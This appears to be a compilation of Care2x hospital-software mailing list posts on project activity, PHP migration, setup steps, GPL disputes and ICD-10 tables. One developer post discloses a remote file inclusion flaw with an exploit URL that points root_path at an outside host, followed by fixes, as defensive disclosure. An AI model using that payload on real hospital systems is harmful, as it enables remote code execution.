 Hi Mauri,

Thanks for your reply, and I hope all is well with you and your wife.

I agree that there is definitely a need for this software, and as I
said in my email care2x is definitely the most feature rich of the
HIS. However my experience is that nobody will fund what appears to be
 a dead project.

We need to show signs of an active project first.

 will
be rejected then it is all up to you volunteers if you want to work on

The recent emails regarding care2x in Argentina, and the low level of
response reminded me that I have been meaning to send this email for
  sometime.

Having spoken to some Universities recently the general opinion seems
to be that Care2x rates very highly amongst open source HIS in terms
of the amount of functionality, but most people tell me they believe
  the project to be dead.

  Is this true?

I know Moye and others are working on the East African branch, that
Gjergj is working with Albanian hospitals, and Robert is working in
Germany but in overall project terms activity is very low. Emails to
this mailing list rarely get answered, and the web site has not been
  updated in a long time.

There has been intermittent discussions for many years about a rewrite
from scratch but I do not see any progress on this and I think if it
was going to be achieved it would be - Sorry if that sounds harsh but
  as can be seen here

 http://sourceforge.net/p/care2002/mailman/care2002-developers/?style=flatviewmonth=200803viewday=8
this is a very very old topic in care2x.

That leaves taking the current code and moving it on. This is a big
job as PHP/mysql has moved on a long way and a lot of stuff that
existing care2x depends on is now deprecated and even removed. If you
don't believe me set error_reporting to -1 and set display_errors to
On in PHP and then try using Care2x. I tried sending emails to the
list a few months ago to try and generate discussion and help on these
issues but got very few replies and even less help. Just getting it
working with PHP 5.5 would be a time consuming job that requires a
dedicated group of people. The work is not that tough, but there is a
lot and is too much for one person.

So what do people see as the future of Care2x? Is there a group of
people interested in working on bringing the current code up to
  scratch?

  Thanks
  Tim

To Ap.Muthu,

I don't know exactly how that happened. I was not aware that it is for sale.
The doc was
still open for public when I sent the email.

To Claudio,

You are right, it is good to have a place for collecting these docs and
articles about care2x.
We did that in the early years of the project. This was discontinued because
of various reasons,
no one available to do it regularly, the sites were hacked, had tech
troubles, and etc.

 Hi guys.

Mr Rocco in the email attached in this one has signaled to me something
 that seems a possible defacement.
If you go on the link http://www.care2x.com/foundry/?lang=it and click
on Physical Thereapy you will find some link like this one

 http://www.care2x.org/foundry/modules/news/editor-4plus1-read.php?sid=dce941b2e27759557f5fa8331f1f762elang=ennr=28news_type=headline

that is dated as 2006 but the link will show some embarassing threats
 for the project.
Maybe I hope is a joke of one team member otherwise we have to consider
other possibilities like defacement or other.
 I hope not.
Please can someone correct this bad link?

 Thank you in advance.

2009-01-09 Thread Elpidio Latorilla
Hello,

A couple of years ago, we had the same issue of people seeing things in
personal way. I don't know if that was a trick to force things the way they
want it to be.

But the project is still going on and continue to be useful even if some
people don't see it
that way.

So I'd say, just cool down and let things go their natural way.

Thanks

 Hi all,

First of all: We have figured out some interesting parts what should be
done next. One of it would be to change the current appointment module
to one what would be more flexible (that even not admitted people could
make an appointment). Just an idea.

But I can understand why some quite good and inspired developers here
just not plan to commit their changes in some own branches without any
comment here as long there are quite interesting comments published
from some developers in really rude words in the past.

Actually I got in the last months some PM with the suggestion to exclude
all out what does not have committed anything (some even to suggest even
to exclude just one specific person) - because these people seems not to
have the permission to be a status developer and some got the
intention that they just plan to sabotage. This is definitely not my
impression but these suggestions I got so far.

The other suggestion I recognized was to divide by developers and
stakeholders. Those stakeholders (consultation people) and should be
refer to an different and own mailing list and developers can talk about
 developments.

But I haven't agreed to such dramatic steps because this is open source
and everybody should have the right to say what he think about. And it
is up to you to select usefully information out of even rude postings
here and just ignore the other parts.

So please, just say what you think, ask what you want to ask and tell
what you want to tell - and just ignore rude and provocative answers
coming from people who has mostly not the courage to use here their real
name in the fear that maybe he can be googled afterwards. ;-)

We would like to thank Gjergj Sheldija for the changes that he
introduced to the arcane Care2x PHP code in order to make it work under
  the most recent web tools.

This Care2x setup will reliably serve at least a 1000 requests per

I hope that this will make it easier to setup reliable and inexpensive

  Materials:
  - bare metal pc with 1GHz P4 CPU, 512MB RAM, 320GB HD

  Methods:
  - We did a setup from bare metal using, exclusively, Open Source
software to serve the Care2x HIS supporting software package from (a
farm of) Ubuntu 8.04.1 LEMP servers (LEMP = Linux + Nginx WebServer +
  MySQL + PHP).
  - The install procedure included the installation of the supporting
system (PART A) and the installation of Gjergj's Care2x 2.6 from the
  SVN (PART B)

  Comment:
  - The total setup time, from bare metal to fully working Care2x System,
including downloading of software was 36 minutes

  Description of the install procedure:

  #
  ## start of procedure
  #
*PART A) Installing the supporting system*

  1. Setup Ubuntu 8.04.1 LTS server

  2. Setup Nginx Web server
# We used Nginx not only because it uses far less resources than
Apache, but also because it is more stable, orders of magnitude faster
and is easily scalable to large clusters. We opted for Nginx ver. 0.6.32
from the Debian repositories has fewer bugs and better functionality
than the version in Ubuntu Hardy 8.04 LTS repositories. It consistently
installed without any problems and has been working reliably .
- wget

 http://http.us.debian.org/debian/pool/main/n/nginx/nginx_0.6.32-3_i386.deb
- sudo gdebi nginx_0.6.32 nginx_0.6.32-3_i386.deb
- sudo /etc/init.d/nginx start
# browse to http://localhost/ and you should get the spartan nginx
  welcome screen.

  3. Setup PHP and FastCGI
- sudo aptitude install --without-recommends php5-cli php5-cgi
  php5-mysql php5-gd php5-sqlite
- sudo sed -i~ -e '/^magic_quotes_gpc/ s/=\(.*\)On/= Off/'
  /etc/php5/cgi/php.ini
# Unlike Apache, Nginx does not have a way to spawn php5-cgi. To
 serve
PHP code/pages, we needed to setup an independent spawner. We tested
  both the scripts from:

 http://www.mail-archive.com/[EMAIL PROTECTED]/msg352883.html

and other methods, like borrowing the spawn-fcgi code from lighttpd
1.4.20 project. They are both reliable methods that resisted well our
  intentionally started server reboots.

  4. Setup MySQL:
   - sudo aptitude install --without-recommends mysql-server
   - sudo mysql_secure_installation
   - sudo /etc/init.d/mysql restart
   - sudo aptitude install --without-recommends php5-gd php5-sqlite
   - sudo sed -i~ -e '/^magic_quotes_gpc/ s/=\(.*\)On/= Off/'
  /etc/php5/cgi/php.ini # disable magic quotes

  5. Setup phpMyAdmin
- sudo aptitude install --without-recommends phpmyadmin
# press ENTER when asked for the Web server to
 reconfigure
  automatically:
- sudo ln -sf /usr/share/phpmyadmin /var/www/nginx-default/
- browse to http://localhost/phpmyadmin and test it.

*PART B) Installing Care2x 2.6 from the SVN*

- mkdir /tmp/care2x-svn
- cd /tmp/care2x-svn
- svn co
 https://care2002.svn.sourceforge.net/svnroot/care2002/trunk/2.6
- sudo mv /tmp/care2x-svn/2.6 /home/care2x
- sudo chown -R www-data.www-data /home/care2x
- sudo ln -sf /home/care2x /var/www/nginx-default/care2x
- browse to: http://localhost/care2x/ and continue the
 installation
  procedure from there.

mycare2x.com seems to be based in Germany (their address is: An der

Knowing both German and European Law, it seems very improbable that what
they are doing is being done without Elpidio Latorilla's authorization.

If that was not the case it would be a simple matter of reporting it to:
 http://www.fsf.org/licensing/licenses/gpl-violation.htmlacting

As long as Elpidio's is the sole copyright owner of
all of Care2x's code (both the code written exclusively by him, and any
other piece of code contributed by anyone else), he can license it under
any other conditions (open or closed) that he chooses to. Those are the
 facts of Copyright Law.

In this aspect Care2x is quite different from Linux, Apache or even
Mozilla, that are collectively owned by groups of people or organizations.

Re: [Care2002-developers] Opinion about mycare2x

2008-06-22 Thread Elpidio Latorilla
Hello Rafael,

myCare2x is based on Care2x, not just merely on the code but the whole
concept, the general design,
the philosophy among many other little things. In fact the name alone is
derived from Care2x.

you will see at their website the notice open source lösung... which means
open source solution.

You can ask them for an open copy of their source code. If it is true that
they follow the license
conditions of open source programs, then they should provide you a copy. If
the don't, then you
can come to a conclusion.

 to think how this
could be solved. Solution could be eBay like system..

If the work is publicly offered in this channel it can be verified in
 online demo when it is
finnished. The client will pay what was aggreed after it is done (the
 payment amount need not
to be public). The reputation of developer and client are the only force
 that will make them
follow their oblications. The project can be split in tasks and if the
 tasks are small enough the
risk is not too big to developer or client.

This kind of system might attract more developers and also clients to use
 Care2x when they
have a better way to get support in their project. I have seen during the
 years we have
worked in our project that it is really difficult to find volunteers, but
this may be the way to
energize the community. It could be like change from amateur to
 professional in sports.

What do you think about my idea?

 Dear Mr Latorilla

We are a company building 2 hospitals in Sri Lanka. (www.hemas.com) They are
multi -speciality hospitals of a 100 and 50 beds.

We have been evaluating various kinds of software for our hospital over the
past one year. We are quite pleased that we found the one you have developed
as we have a chance to improve and customize it to suit Sri Lanka's
situation. Our purpose would be eventually to manage other peoples hospitals
we recognize that a software like Care 2X would be a great asset.

As our hospitals are aimed at the middle income its excellent that the
software is free on the internet. We are grateful that you gave us this
opportunity. We are a poor country peoples ability to pay is limited as
its mostly self paying patients that we have here.

I just felt the urge to communicate with you and tell you how excited we are
to take on Care 2 X along with a local software company who have help us
with the customization.

Please let us know whether there is anything we need to know before we go
down this road

It probably is a generic program similar to the open source OIO

Re: [Care2002-developers] Care2x V 3.0 alpha

2008-01-27 Thread Elpidio Latorilla
Thank you very much Robert.

I agree with your statement that when Care2x becomes adapted to a local
hospital, the result is too customized and not useful for other countries.
This has become obvious a couple of years ago when the Italian Olympic
Committe
Clinic gave us all their modifications of Care2x. The product was too much
customized that even I could not make it useful for my locality. This
packaged has been on the internet for download but nobody really found it
useful (except for the Italian clinic of course).

The Care2x is a concept, not just a software code. If we embrace the concept
consistently, we can have a product that is adaptable to our local needs.

There has been reports of Care2x running in other countries (or at least
reports of
customization work being started) but follow up inquiries did not add much
to
the initial information until the sporadic contacts ultimately stopped. This
is not
to be seen as Care2x being stopped. I am inclined to say that the reason is
more or less
similar to what Robert is thinking about the Nepalese version.

Regards to everybody.

On 1/27/08, Robert Meggle [EMAIL PROTECTED] wrote:

Hi Claudio, Elpidio, Daniel and others,

Just took this email to make some ideas about the future. First of all let
say also thanks from my side to Claudi, for the hard work he did. Everyone
who is working on open source knows how much work it is and how much of
positive conditioning is needed to motivate to continue.

It's a fact that in the last years there had been quite interesting
 requests
on my table asking for care2x and how it can be used. Some tested it, some
are just interested in but most of all just checked it out, modified it
 and
I lost the contact to them. So I guess they are fine but haven't got any
feedback so far. Let's bring the example from Healthnet Nepal, there was
 a
request 2006 from one system programmer there to modify care2x 2.0
HEAD-release to a private clinic in Nepal. Now he is not working at this
company, he moved to an ISP as system admin in Kathmandu/Nepal. His
 follower
of his old company showed me once the work he did asking for some detail
questions how care2x works. So here I saw that they did really Nepalese
customaries, but not usable for rest of the world. Also some diplomatic
issues of his boss of getting afraid about competition when he will
 publish
and release it for Nepal. (Latter just a feeling, if everyone in Nepal
reading it, and my interpretation is not true, just feel free to correct
 it
 :-)

So that's just one example that the work we are doing are correct. Most of
all assigned here on SF.NET might could tell similar stories and some of
 the
developers did once such a job and now still reading the developers list.

I will not say that care2x is lost, but actually Mauri is right. Care2x is
an application for Hospitals what is worldwide used. Everyone having own
requirements what makes the availability of scalable (and also free!)
 software so extremely difficult.

So care2x is not stopped. By conception and working on the care3x, we are
really on a right trap and by getting all of these influences, ideas and
concepts worldwide it makes clear what we need: Really flexibility and
techniques used rooted to the soil (Web application - no linked compiled
stuff from c++ or just resource killing java applets). So let's start from
the beginning. A registration module what can be used woldwide, in Europe,
Africa, Asia and all other continents. Then we should use the latest
technologies like MVC to have a good control to add, remove or disable
components and each of it must be individual changeable - and most of the
modules should be able to migrate. Sounds not realistic, but it's just
 what
we have.. a free care2x used now worldwide but when it's running, there is
seldom a feedback that it is what it is: Just working.

 Robert

 Hello Anousak,

This morning I had some time for a really interesting results, what could
 be
 quite interesting for all.

I have here just windows running on my laptop. I installed here some time
ago xampp-win32-1.5.4 and have never looked what PHP version it used out
 of
the box, and I thought it should be PHP5 (Why not, this xampp version
 isn't
so old..). By all the discussions last week there was just the feeling
 that
there is something in the soup of the kitchen. Fact... I checked it today,
care2x is running fine under php 5.1 on windows without any problems (I
 used
that laptop by presentations, so that would be worse when there are
 strange
effects and by questions of the audiences I opened menus what I quite
 seldom
 using normally).
Now, I have looked to php.net to find out what could be the headache of
 the
past, because even me I had the effect that care2x presenting you a blank
page when you're using the latest php 5.2.x release.
There are some interesting information on php.net:
 http://www.php.net/manual/en/migration52.incompatible.php

This has the headline that there are some major changes done by PHP from
 5.1
to 5.2 called Backward Incompatible Changes.

Just for real hardcore developers: By reading that documentation, my eyes
gravitating now around the PHP internal magic method __toString(). That
 is,
accord. to the documentation, called like a real string context and an
 obj.
whats misused that by side effect going now to a fallback what no longer
giving the internal object-id. Maybe some developers (and maybe I cannot
promise that I haven't used that kind of luck) in the past have used it
inside if-statements to check it instead of using the prepared function
is_a() what returns true if the object is initialized.

Alternative we should also focus the adoDB what we're using as
DB-abstraction layer is not on the latest one. I have tried to replace
 adoDB
with the latest version but this seems to be quite a hard job, wasn't
running just out of the box. I cannot say for the moment what makes
 trouble
here, still need little bit time to check carefully for it.

Maybe someone could check my hypothesis that care2x is running fine under
php5.1 under linux as well - then we can focus to release RC2 as PHP5.1
compatible with some restrictions to PHP 5.2?

Before someone give a hand up and asking why we're not starting right now
 to
be close to the PHP releases... so there is quite often the case that not
all restrictions have a big future on PHP and the community is like
 anarchy,
senseless will disappear or introduced again: So e.g. the abstract static
class functions, introduced by PHP5 and maintained till PHP5.1 is dropped
out without any comment under PHP5.2.

Please let me know about the results using care2x under LAMP5.1 (Linux,
 apache, mysql, php 5.1)

 Robert

Thanks Daniel and Claudio for your help.

I am now able to start and stop PHP4 using XAMPP; however, XAMPP has
its own webserver running. My Care2x is extracted to /www/care2x and
XAMPP doesn't know about this location. How can I tell XAMPP to look
for this location or where I should move Care2x files so that XAMPP
  can work with it.

Much appreciated for your kind help in advance.

Hi Robert,

On 7/3/07, Robert Meggle [EMAIL PROTECTED] wrote:

But the handling could be difficult. When there is a invoice system in
my eyes, there should be a minimum of paper and double work. All information
what should be shown in a invoice are still in the system and there is no
reason that the billing officer has do to double work by selecting the
correct patient or selecting the items what should be paid.

We decided to integrate it on one more abstraction layer: Who can say that
the patient can afford it, which makes the guarantee that there is no
patient running away without paying. So there should be also a tiny
accounting system who should point the payment to self pay, insured and
some more accounts.

That is true. That is what integration is suppose to achieve, to reduce
double work and increase efficiency.
Please discuss with Claudio about including your work in following releases
instead of just leaving them in a separate
branch. I know that your work is more focused on Tanzania hospital
environment but if both of you discuss the
pros and cons, your solutions might be generic enough for the main releases.

Re: [Care2002-developers] Wiki

2007-06-29 Thread Elpidio Latorilla

The wiki is for some unknown reason not editable. Also, all admin users got
lost
from the database. So, nobody can reconfigure the wiki via online interface.
The only solution is to upgrade the wiki. I tried it last time, planning to
upgrade it to
the latest version but it required php5. I asked Noel to change the servers
php to php5 but then
the care2x demo broke because it is not yet php5 compatible.

Finally, Noel downgraded the server to php4 to bring back the care2x demo
online.
But the wiki upgrade has not been done. I think it can be upgraded to some
version
that still uses php4. I will update you all about this matter.

there was an attempt to do that. A software developed in Spain was used.
However it was not compatible

the effort did not go very far.

However, if you want you can always connect a dicom software to care2x. It

[Care2002-developers] demo back online

2007-06-02 Thread Elpidio Latorilla

Hi all,

the demo is back online. the problem was the error-reporting setting on the
script side.
The hardwired setting was probably changed by the attempt to upgrade to php5
and
was never put back to previous version by the subsequent downgrade to php4.

Regards to all,
Elpidio

Hello Daniele,

As long I'm working fort his project I saw sometimes really the need of
rewriting whole modules. I saw the quite nice ideas from the beginning and
that some parts got a kind of uncontrolled growth like in each other
sector
of OSS.

But care2x is not so bad at all, it is a great opportunity! I think it is
a
good idea to look forward for this project and foster the development to
the
next generation of a fertile HIS for everyone everywhere. Care2x must be
adaptable for each requirement and we have to think about who is willing
of
using it.

When I look back to the development customaries we did for East Africa and
the quite big resonance that there is really the need for we should focus
for that. But care2x has some rated break points and it is covered in your
small summary.

When we look just to your first requirement idea of building compatibility
to PHP 5 there is quite a lot of work to be done.

 - Use of Php version = 5

What is the main reason for our headache here? It is that PHP has changed
it
to real OOP what was sloppy done in previous PHP versions (4.whatever).
There was the way of OOP but just on the basis and not having
accessibility
modifiers like public (it was the default and no other way), protected and
private. Similar to the implementation of interfaces (GUI or database
abstraction layer) these rules are really purely for the convenience of
the
programmer?

IMHO we should focus the later versions of PHP and following higher level
of
OOP. To specify the visibility of our class members brings more safety by
protecting it from outside influence.
So when we start here from scratch we should bring a real, clear
structured
API to the object model. In my vision there should be a way for users to
implement their own requirements based on the object model and there is no
need for uncontrolled growth.

 - Use of some kind of development framework (for example Zend Framework)

... A nice consistent Framework, and easily rollout web, gui, and back end
applications all using the same framework that is our aim, yes? :-)

To have a framework is a quite good idea but for security aspects we
should
take care that there is no lack in security issues and to make sure that
there will no lack given. And it fits to eclipse.

So IMHO: Yes, I ACK with 100% for such framework for rel. 3.

 - Modularity: we need a small core which can be easily extended with
 modules
and plugins. All modules must follow the same behaviour and must have
the
same way to access the core functionalities

That would be no problem when there is a valid object model, a proper used
framework and disciplined programmers :-)

 - Database indipendence

That is always the old story. The current version tries it to cover that
requirement with adodb what is a quite good way. But the way how it is
used
and to cover all these cases what makes quite a lot of work for
developers.
Also for me, I do not have here e.g. a Oracle database running and cannot
test it. Then all these slangs and interpretations of SQL makes this
line
quite interesting.

So when there is a quite interesting abstract class for sql queries what
could translate to the used database, as it is solved in the current
class_core, then it would be an interesting method for such an solution.

What's funny for the current project: According to the current used object
model a person is a core. That's somehow funny when OOP should describe
a
case like in nature.

IMHO to set up a new intelligent object model there is a brainstorm
needed.
Out of it there should be painted to an UML model that we have a quite
nice
idea to build it new. When we are planning it in such a way of rewriting
it
completely new, we should make it better as it currently is.

 - Common rules in writing the code
 - Better documentation
 - More and better comments in the code

We have rules, we have a way of documentation and there is always the
possibility to comment each line of code. Best documentation is given by
Elpidio, later developments done by others has quite a lack of
documentations. Also, blame on me, I'm not the best documentaries writer;
it
is mostly some small words but not such an excellent API description done
by
Elpidio in the beginning.

Be the way, I have here from time to time quite interesting studies done
by
myself or cooperating companies. But there was no way of adding new topics
in the current wiki.

So for me: When there are new concepts, new ideas what makes sense, then
it
would be a nice challenge. But it is quite a lot of work to be done and
this
is not easy. But for me... I'm doing my best to use, propagate and
contribute to open source projects. For me this is a great opportunity to
do
so

 Hi Gwen,

This will just work when you have smaller databases. If it's bigger you
might have timeout errors if you're using phpmyadmin as interface.
 Better to
do it on a shell using the tool mysqldump.

But the question of OP was not how to backup (or restore) an existing
 care2x
database, it is - when I understood correct - how to migrate form
whatever-system to care2x. This must be done by individual script to
convert existing data structure to care2x and its care_person table (or
 other tables).

By the way, I would like to post more of our experiences, also to handle
data corruptions and so on to the wiki page. Who is responsible for that

pages to upload their some manuals about care2x we have?

At the moment I'm working as a consultant for The Ministry of Health in

MoH is in the process of implementing Hospital Management System. MoH has
tried out different systems, and we have not yet found a system, that is
suitable for our demands.
Do you have any information technical as well as user related so we can

Hello developers,

We found a security lack what will give the possibility to misuse our
care2x. Try this out:
http://URL/include/inc_environment_global.php?root_path=
http://see-your-ip
.info/cmd.do?

(just bring the root_path-variable as GET to the script).
Inside of inc_enviroment_global.php there is just one line like
   require($root_path.whatever); //or
   require_once($root_path.whatever); //or
   include($root_path.whatever);

When you have enabled the php settings for allow_url_fopen=Yes then the
foreign site will be included (from the remote place).

1. It is strictly forbidden to expect that critical variables like
root_path
will be included by the calling script and available in the included
files.
Always there must be a fresh including of roots.php. Seems to fix it...
2. Try to eliminate that this kind of include-files will accept GET or
POST
variables by adding on the top:
   if ($_GET['root_path'] || $_POST['root_path']) die();
-In this case the script will be stopped when somebody try to give the
root_path by get or post variables. Seems to fix it...
3. You can also set the environment variable in the php setting for
allow_url_fopen to no. Seems to fix it...

I made a workaround like I described above.
In most cases of that project it is no problem. But exactly here, in the
include folder there is the main idea that root_path variable is set by
the
calling script (like index.php) and the included file (like
include/inc_enviroment_global.php) will use it in (without reloading it
from
the file roots.php.

Dear Sir/ Madam,

We are a small hospital in Botswana and are currently looking for a Hospital billing system.
We recently came across your website, unfortunately we are unable to runyour demo online. Is it possible to send us a CD with installation instructions. We could have downloaded the software online but we use a dial up connection as such we could not manage to download it.

Your help will be highly appreciated.

[Care2002-developers] Rotating project manager

2006-07-01 Thread Elpidio Latorilla
Hi all, there are 2 changes that will be announced sooner or later.1) Kaloyan's term as release manager is going to end soon per protocol. He has done a verygood job and I personally would like him to continue doing what he is doing. But we have setup
guidelines and protocols, so we are bound to follow them. (We cant make rules and break them, can we?) :)The result of this is that we will be looking around for a new release manager to take overKaloyan's role. Anybody can post his interest now. Kaloyan has the privilege to decide who will
become his successor for the next term.2) Owing to Kaloyan's success as release manager, I am entertaining the idea of releasing myrole as a project manager and start a rotation of project manager, much like the release manager.
I will start a rough draft of the guidelines and protocols governing this. Another reason for this ideais the fact that I have very little time for the project right now and in the coming year. This might change
in the future though, so the rotation of project manager will be fine (I hope).Keep tuned.Elpidio

Re: [Care2002-developers] Care2X Issues and Fork

2006-06-17 Thread Elpidio Latorilla
Hi all,

right at the very early stages of the project, it has become clear that
the main care2x releases will be more or less generic. The actual
versions working in hospitals will be adapted and specialized and become
more or less different from other versions in other hospitals. They are
not forks because a fork has a political component in it. They are
just the correct use of the open-source's character of easy adaptability.
Let me borrow Mauri's term of parallel modules. If all these are
shared openly, each group might benefit from others, not necessarily
being able to use the whole version but parts of it.

One good example for the above is the version shared by the Italian
Olympic commitee. This version is shared and available but it cannot be
taken as a whole
and use it in another hospital without additional modifications.

Regards,
Elpidio

Hello All,

I have been on this list since 2002 and many of the active ones have left and
this
project needs new blood and good software developers. Some have made their own
versions and I have not heard much about them. There are also many spanish
speaking developers, who probably have done a lot but I cannot understand
their
communicatin. Care2x.de is active good product but I am not sure if they are
willing to
share their work freely. I believe that a lot of work has to be done before
original Care2x
can meet the standards in USA or Canada.
The requirements are very different in different areas. When we started to
develop our
East-African version we found that we could not use many components of the
orignal
version and there were many modules that were crucial for us but were not in
Care2x.

I would like the idea that Care2x would have different parallel modules, which
the user
could select depending on his requirements just like you can select which
applications
you choose when you install Linux.

But I hope that the stong developing communities in USA and Canada would bring
new
blood to this project and not start to do completely new software. Our branch
is going to
get some developers from both of those countries. I think we all would
benefit from
good quality open source and free software both in developed and developing
countries.

2006-06-17 Thread Elpidio Latorilla
Hi Meir,

Good intention from you but do you know what is really going on behind
that scheme?

myCare2x has been being complained of violating the GPL license. This
has been
reported to the FSF foundation's legal department already. All attempts
to communicate with
myCare2x.de has been ignored.
It has been alleged that myCare2x.de will require you to pay them around
5000 Euros (around 6500 US dollars)
for them to let you see the code. Then they will not let you
redistribute the code to outsiders.
The outsiders means those who did not or cannot pay the 5000 Euros.

Is that a real open-source or is it not similar to Microsoft's dealing
with the Chinese
government to let the government see the MS code as long as they keep it
secret?

It is your choice. But one thing is sure, the open source was not done
that way, and will never
be good that way.

Pls. try to read between their lines and know whats happening behind the
beautiful facade.

Sincerely
Elpidio

I also found out just yesterday, that when my return address is at

not get through (although it is registered on the list), so I am using
care2x.org which works.
I have no answer to that for now. FYI: the sf.net updated the mailing

This could be a bug. I dunno for sure.

Regarding the care2x docs, you have to bear with us for a while. The
hosting rebuild the

rebuilt. So, its back to zero
again :(

Its a pain in the neck, I know. But hey, crisis builds character. :)

 Thank you for the insight.
I am putsuing a SIMS (surgical info. manag. system) for the Ottawa
hospital The major components seem to be:
 - sheduling of Op. Rooms and resources
 - interfaces with the siemens SMS system, HL7 oriented
 - supporting multiple campuses
 - reports
 - intertace with an inventory management services

The biggst issue i have at the moment is scheduling of resources.
the solution I prefer is rapla
http://rapla.sourceforge.net/index.html, the issue thogh is that it is
Java (BTW, it won't be a bad idea to interface care2x with jboss)
there are some open-source PHP based scheduling system, see for
 example phpscheduleit at
 http://sourceforge.net/projects/phpscheduleit/
the one I prefer is PHPLite

[Care2002-developers] current care2x tech problems

2006-06-16 Thread Elpidio Latorilla
Hi,

the current plan is to move the care2x again to a dedicated server.
All this
after that disastrous unscheduled move by the current hosting company.
First, the care2x.org domain will be pointed to the new server while we
keep the
care2x.com domain pointing to the old pages. Both will have broken links
for
some time while we repair the site. When the new pages are fixed, the
care2x.com
will be pointed to it.

It will take some time before everything is back to the previous status.

Real work will solve the problems.

Re: [Care2002-developers] Fwd: Integration of ICD 10 codes in french

2006-05-12 Thread Elpidio Latorilla

Hi Kaloyan,

this could be a good entry in the manual wiki.

Elpidio

Kaloyan Raev wrote:

Hello,

As far as I know there is no guide How to integrate icd 10 codes in a
New Language in care2x. But I can give some technical information.

The ICD10 codes are stored in the database in separate table for each
language. The table is named care_icd10_xx, where xx has to be
substituted with the language code (for French this is fr).

The structure of the table is as follows:

Field Type
=

diagnosis_code varchar(12)
description text
class_sub varchar(5)
typevarchar(10)
inclusive text
exclusive text
notes text
std_codechar(1)
sub_level tinyint(4)
remarks text
extra_codes text
extra_subclass text

The three most important fields are:
 - diagnosis_code - the icd10 code, example A00

 - description - description of the icd10 code, example Cholera
 - sub_level - determines the number of digits/signs in the code.
Example, for A00 the sub_level is 3, for A00.0, the sub_level is 4.

The database table is filled during the installation by a corresponding
CSV (comma-separated-values) file: icd10_xx.csv

The location of the icd10 csv files in the Subversion repository is:

 /trunk/Care2002/installer/db/icd10

If you want to introduce icd10 codes for new language there are two
approaches:
 1. You have the translation already (for example by a healthcare

institution) in some data format (ex. Excel). You have to convert the
data to a CSV file.
 2. You want to translate icd10 from scratch. In this case you take an

existing CSV file (ex. icd10_en.csv) and translate the text in the new
language.

In both cases you end up with new icd10_xx.csv file. Then you have to
submit the file in the Subversion repository.

You have to also update the sql dumps that create the database structure
- to create the care_icd10_xx table that will hold the icd10 data for
the new xx language. The location of the sql dumps in Subversion is:

 /trunk/Care2002/installer/db/sql

For French language you have to add the following in the
mysql_dump.sql:

CREATE TABLE care_icd10_fr (
  diagnosis_code varchar(12) NOT NULL,
  description text NOT NULL,
  class_sub varchar(5) NOT NULL,
  type varchar(10) NOT NULL,
  inclusive text NOT NULL,
  exclusive text NOT NULL,
  notes text NOT NULL,
  std_code char(1) NOT NULL,
  sub_level tinyint(4) DEFAULT '0' NOT NULL,
  remarks text NOT NULL,
  extra_codes text NOT NULL,
  extra_subclass text NOT NULL,
  KEY diagnosis_code (diagnosis_code),
  PRIMARY KEY (diagnosis_code)
);

and in the postgres7_dump.sql:

CREATE TABLE care_icd10_bg (
diagnosis_code character varying(12),
description text,
class_sub character varying(5),
type character varying(10),
inclusive text,
exclusive text,
notes text,
std_code character(1),
sub_level smallint DEFAULT '0',
remarks text,
extra_codes text,
extra_subclass text
);

CREATE INDEX icd10bg_code ON care_icd10_bg USING btree (diagnosis_code);

Updating the sql dumps and adding the csv file will automatically update
the installer to give the possibility to install the icd10 codes for the
new language.

Greetings
Kaloyan

Some othe ideas to fit the programm for italian hospitals...
Think will be a good idea create an italian focus over the care2x analisys.
Some ideas:
1- A better acoounting system not only by area but also by ward or dept.
2- Introduce the birthplace for the patient so we can calculate the SSN code
3- Integration between the Care2x installation in use in italy (thik are 5 or
6)

The stone is launched... let me know ;)

Re: [Care2002-developers] Extracting management information from Care 2x

2005-12-12 Thread Elpidio Latorilla

Hi Vincent,

your observation is correct, it is primarily designed around the flow
and the functioning of the hospital system.
The main reason is that it was originally intended to improve the work
of the staff as they actually work.

Statistics, reporting, data mining and research, etc will be tackled in
the future. You can take a look at
this http://www.care2x.org/wiki/index.php/ER_Diagrams to have an
initial glimpse on the data structure.
This is not yet complete but should help you initially.

Open source software is made through give and take. Any gross imbalance
is detrimental to its
development. If you have plans, design improvement docs or blueprints,
analyses, improvement code or modules,

share it with the rest.

elpidio

Vincent Shaw wrote:

Hi there everyone
I have been following the list for a while and also exploring the software
to some extent. One of the issues that we (the Oslo group) have been trying
to uncover is how to extract information from Care 2X to enable management
of the hospital to get a sense of issues like bed occupancy, average length
of stay, most common diagnoses in different wards, and most frequent causes
of death, amongst others (there are usually also lots of types of reports
linked to maternity data as well).

But it seems to me that Care2x development has to date focussed on the flow
of patients and the functioning of the system around that aspect. Is anyone
out there extracting this data? Are there any plans to provide some kind of
reporting system for management from Care 2X in the future?
